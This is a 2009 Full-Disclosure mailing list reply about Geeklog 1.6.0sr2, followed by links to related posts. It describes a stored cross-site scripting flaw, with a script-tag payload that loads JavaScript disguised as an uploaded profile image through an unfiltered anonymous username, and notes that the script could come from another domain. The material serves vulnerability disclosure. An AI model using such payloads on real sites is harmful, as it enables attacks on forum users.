Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload



On 4 Oct 2009, at 08:47, Jaloh Smith wrote:
The
easy one is when the forum allows anonymous posts and is configured
for
text posts. The anonymous user name is never filtered, so you can put
anything there, including a reference to the javascript uploaded as
the
user profile image..

<script src="../images/userphotos/username.jpg"></script>

That's actually a much worse exploit than the file upload. There's no
reason the script you load has to be stored locally -- it works just
as well if you pull it from another domain.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
    ... Cause all I see here is a RCE in the admin panel. ... You confirm that there are XSS but we don't have any details about ... easy one is when the forum allows anonymous posts and is configured for ... The anonymous user name is never filtered, ...
    (Full-Disclosure)
  • Re: N9ZLE.COM forum a success!
    ... The forum is moderated. ... I may open the swap meet section up to anonymous posts. ... problems then I will require users to register to post there. ...
    (rec.radio.amateur.boatanchors)
  • ignore this message also
    ... this message is from an anonymous user on yendor's phpBB gateway ... forum. ... but should still appear in original thread. ...
    (rec.games.roguelike.development)